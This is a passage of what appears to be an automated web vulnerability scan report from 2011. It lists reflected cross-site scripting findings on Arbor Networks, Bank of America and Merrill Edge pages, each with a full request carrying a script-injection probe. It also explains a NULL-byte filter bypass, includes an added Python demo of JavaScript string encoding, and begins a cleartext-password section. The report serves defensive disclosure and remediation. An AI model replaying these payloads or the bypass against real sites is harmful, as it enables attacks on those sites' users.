Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=end8239"><script>alert(1)</script>31f3540dcc0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:03:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=410866f9e5772176ae7e03196c5efdab; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:03:25 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:03:25 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:03:26 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:03:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="end8239\"><script>alert(1)</script>31f3540dcc0">
...[SNIP]...

3.175. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b457f"><script>alert(1)</script>667bdae159f was submitted in the mbfcookie[lang] cookie. This input was echoed as b457f\"><script>alert(1)</script>667bdae159f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked. Note that the payload and the request recorded for this entry contain no %00, and the reflection is the same as in the other mbfcookie[lang] entries; the captured evidence therefore does not corroborate the NULL-byte remark for this particular request.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) or other filter written in native code, where C string functions (strlen, strstr and the like) treat a NUL byte as the end of the string: the filter never inspects the bytes after %00, while the application's length-prefixed strings (PHP, .NET, Java) keep them and pass them into the response. You should fix the actual vulnerability within the application code by encoding output for its HTML context, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /index.php?option=com_content&task=view&id=296&Itemid=297 HTTP/1.1
Host: www.arbornetworks.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; mbfcookie[lang]=enb457f"><script>alert(1)</script>667bdae159f; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.2.10.1296689848

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:47:30 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=-; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:29 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:29 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:30 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4889
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerLogi
...[SNIP]...
<meta lang="enb457f\"><script>alert(1)</script>667bdae159f">
...[SNIP]...

3.176. https://www.arbornetworks.com/register.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /register.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bddb"><script>alert(1)</script>119487711af was submitted in the mbfcookie[lang] cookie. This input was echoed as 1bddb\"><script>alert(1)</script>119487711af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /register.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1bddb"><script>alert(1)</script>119487711af; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:06:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=789c30ca4dc20e92c36bbaf88590c360; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:06:21 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:06:21 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:06:22 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:06:23 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerLogi
...[SNIP]...
<meta lang="en1bddb\"><script>alert(1)</script>119487711af">
...[SNIP]...

3.177. https://www.bankofamerica.com/privacy/Control.do [BOA_0020 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0853'%3balert(1)//b444241d7da was submitted in the BOA_0020 cookie. This input was echoed as b0853';alert(1)//b444241d7da in the application's response, which shows that the application URL-decodes the cookie value before use (%3b arrives in the script as ;) and performs no escaping for the JavaScript string context: the quotation mark ends the string literal, the semicolon ends the statement, and // comments out the rest of the original call.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it cannot be avoided, the value must be encoded for the JavaScript string context (for example \uXXXX encoding of every character outside [A-Za-z0-9]) at the point of output; HTML entity encoding is not a substitute, because browsers do not decode entities inside a <script> block.

Request

GET /privacy/Control.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853'%3balert(1)//b444241d7da; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:17 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00004QCD_ZjewAQatQwb0kn5dXN:12qb4kb6q; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:16 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   '20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853';alert(1)//b444241d7da',
                   false,
                   null,
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

3.178. https://www.bankofamerica.com/privacy/index.jsp [BOA_0020 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fed0'%3balert(1)//f83f2273ab8 was submitted in the BOA_0020 cookie. This input was echoed as 3fed0';alert(1)//f83f2273ab8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0'%3balert(1)//f83f2273ab8; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:15 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000CnfCKRIifEAopeDjObSoiF3:12qb4k93q; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:14 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...
<!--


               cmSetProduction();
       

               cmCreateRegistrationTag(null,
                   'overview',
                   '20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0';alert(1)//f83f2273ab8',
                   false,
                   null,
                   null,
                   'privacy',
                   null,
                   null,
                   null);
       
       
//-->
...[SNIP]...

3.179. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0296'%3balert(1)//224de741dab was submitted in the BOA_0020 cookie. This input was echoed as a0296';alert(1)//224de741dab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296'%3balert(1)//224de741dab; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000iSQjObSnt8ukh_g0-dQwNmC:12qb4k2ev; Path=/
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:38 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...
<!--


               cmSetProduction();
       

                                   cmCreateRegistrationTag(null,
                   'smbiz',
                   '20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296';alert(1)//224de741dab',
                   false,
                   null,
                   null,
                   'homepage');
//-->
...[SNIP]...
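The three BOA_0020 entries above (3.177 to 3.179) share one sink: the cookie value lands inside a single-quoted string argument of cmCreateRegistrationTag(). The following added example is not Bank of America's code; the reduced one-argument template is an assumption and the tokenizer is a deliberately minimal one. It decodes the recorded cookie as the application evidently does, builds the script line once with naive quoting and once with \uXXXX encoding of every non-alphanumeric character, and then walks the result the way a JavaScript tokenizer would, to find where the string literal really ends and what source text follows it.

```python
from urllib.parse import unquote

# Constructed sample: the BOA_0020 cookie as recorded for finding 3.177. The
# application URL-decodes it before use, which is why %3b arrives as ';'.
RAW_COOKIE = "20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853'%3balert(1)//b444241d7da"


def naive_literal(value: str) -> str:
    """What the page does: wrap the decoded value in single quotes, nothing more."""
    return "'" + value + "'"


def js_string_literal(value: str) -> str:
    """Context-correct encoding for a JS string literal inside <script>: every
    character outside [A-Za-z0-9] becomes \\uXXXX, so neither a quote, ';',
    '//' nor '</script>' survives as syntax. Astral code points become a
    surrogate pair, which is what a JS engine expects in \\u escapes."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp > 0xFFFF:
            cp -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)))
        else:
            out.append("\\u%04x" % cp)
    return "'" + "".join(out) + "'"


def render_script(cookie: str, encoder) -> str:
    """Reduced form of the inline call seen in the responses (hypothetical template)."""
    return "cmCreateRegistrationTag(null, 'overview', %s, false);" % encoder(unquote(cookie))


def end_of_single_quoted(src: str, start: int) -> int:
    """Index just past the closing quote of the JS string literal that begins at
    src[start]; backslash escapes are skipped the way a JS tokenizer skips them."""
    if src[start] != "'":
        raise ValueError("no string literal at offset %d" % start)
    i = start + 1
    while i < len(src):
        if src[i] == "\\":
            i += 2
        elif src[i] == "'":
            return i + 1
        else:
            i += 1
    raise ValueError("unterminated string literal")


def code_after_value(script: str) -> str:
    """Source text following the third argument's string literal. With correct
    encoding it is the rest of the call; with naive quoting it is attacker code."""
    after_overview = script.index("'overview'") + len("'overview'")
    third = script.index(", '", after_overview) + 2
    return script[end_of_single_quoted(script, third):]


if __name__ == "__main__":
    for name, enc in (("naive", naive_literal), ("\\uXXXX", js_string_literal)):
        script = render_script(RAW_COOKIE, enc)
        print("%-7s literal ends, then: %r" % (name, code_after_value(script)))
```

For the naive rendering the text after the literal begins with ;alert(1)//, exactly the statement the scanner's probe was built to execute; for the encoded rendering it is just ", false);" and the cookie value is still delivered intact to the script, only spelled with escapes.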

3.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9e1d"><script>alert(1)</script>a47d51819dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9e1d"><script>alert(1)</script>a47d51819dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/merrill-edge-advisory-center.aspx?%00f9e1d"><script>alert(1)</script>a47d51819dc=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=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; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?%00f9e1d%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea47d51819dc=1
Set-Cookie: pxs=82f6fd15b4a44839afcaacbd61ee9100; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.f9e1d"><script>alert(1)</script>a47d51819dc=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.181. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [src_cd parameter]

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0095641'%3b9ef12e8200f was submitted in the src_cd parameter. This input was echoed as 95641';9ef12e8200f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:20:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=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; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f
Set-Cookie: pxs=14a1ffa6d76642968f1b53551d28d1bb; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 77626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- Thank you for using
...[SNIP]...
<![CDATA[
var SPC = {
'Tactic' : 'BAC1.95641';9ef12e8200f'
,'Page' : 'merrill-edge-advisory-center'
,'preview' : false
};
//]]>
...[SNIP]...

3.182. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [pxs cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/pages/home.aspx

Issue detail

The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c13e'-alert(1)-'c4f9da1816c was submitted in the pxs cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /IRA/pages/home.aspx HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pxs=689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c; SMIDENTITY=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; pxv=4B1B9E90-7DD2-4095-A535-9FE88031C408; CMAVID=none; cmTPSet=Y; BrowserCheckDone=true;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<![CDATA[
lpAddVars('page','section','Home');
lpAddVars('page','ConversionStage','Home');
lpAddVars('page','Session ID','689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c');
var cookieExists=false;Sys.Application.initialize();
Sys.Application.add_init(function() {
$create(MerrillLynch.Application.ECMS.WebUI.ECMSContentCtrl, {"Application":"IRA","ContentLocations
...[SNIP]...

4. Cleartext submission of password
There are 19 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


4.1. http://community.invisionpower.com/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /index.php?app=core&module=global&section=login HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=90a4f9618eeed4cbd7aef4daf30fa72a; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:13 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 31585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
</div>
       <form action="http://community.invisionpower.com/index.php?app=core&amp;module=global&amp;section=login&amp;do=process" method="post" id='login'>
       <input type='hidden' name='auth_key' value='880ea6a14ea49e853634fbdc5015a024' />
...[SNIP]...
</label>
                       <input id='password' type='password' class='input_text' name='password' size='25' /><br />
...[SNIP]...

4.2. http://community.invisionpower.com/resources/documentation/index.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /resources/documentation/index.html HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
